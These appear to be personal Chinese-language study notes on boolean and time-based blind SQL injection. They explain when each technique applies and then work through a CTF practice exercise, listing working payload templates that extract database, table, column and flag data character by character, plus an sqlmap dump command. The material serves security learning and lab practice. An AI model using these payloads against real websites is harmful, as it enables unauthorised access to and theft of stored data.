二、布尔盲注
1、定义
web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据
2、条件
- 没有返回SQL执行的错误信息
- 错误与正确的输入,返回的结果只有两种
通过脚本修改URL,payload,if语句
查出字段名(查库,查表,查数据同理)
三、时间盲注
1、定义
web页面只返回一个正常页面。利用页面响应时间不同,逐个猜解数据
2、条件
- 页面上没有显示位和SQL语句执行的错误信息
- 正确执行和错误执行的返回界面一样
1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1)) > %d--
电脑目前脚本路径
F:\python\jiaoben
布尔注入题目练习
通过测试发现改题目为数字注入
通过脚本,查库
1 and ascii(substr((select database()),%d,1)) > %d--
查所有库名(有点多余)
1 and ascii(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)) > %d--
查表
news和flag
1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),%d,1)) > %d--
查字段
1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'),%d,1)) > %d--
查数据
1 and ascii(substr((select group_concat(flag) from sqli.flag),%d,1)) > %d--
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username' --dump
-u接URL
-D接库名
-T接表名
-C接字段名